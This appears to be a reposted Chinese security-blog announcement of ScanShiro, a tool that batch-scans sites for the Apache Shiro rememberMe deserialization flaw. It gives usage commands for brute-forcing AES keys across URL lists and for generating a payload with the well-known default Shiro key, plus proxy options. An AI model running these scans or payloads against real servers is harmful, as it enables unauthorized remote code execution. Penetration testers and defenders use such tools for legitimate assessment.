===================================
0x01 工具介绍
一个批量扫描shiro漏洞的工具,支持AES/CMG。
0x02 安装与使用
1、暴力破解key
java -jar ScanShiro.jar -u http://0.0.0.0 -k key.txt
2、批量暴力破解key
java -jar ScanShiro.jar -f url.txt -k key.txt
3、根据正确的key生成payload 适合在有key无gadgets的情况下
java -jar ScanShiro.jar -p payload.ser -c kPH+bIxk5D2deZiIxcaaaA==
-n 参数是值修改shiro中cookie的名字少部分环境存在,默认是rememberMe
-proxy 参数是代理 目前只支持socks5代理并且没有用户名密码
0x03 项目链接下载
2、关注公众号"网络安全者",后台回复:工具,链接仅当天有效
3、每日抽奖送书
原文始发于微信公众号(网络安全者):shiro漏洞批量扫描 -- ScanShiro
特别标注:
本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
- 我的微信
- 微信扫一扫
-
- 我的微信公众号
- 微信扫一扫
-
评论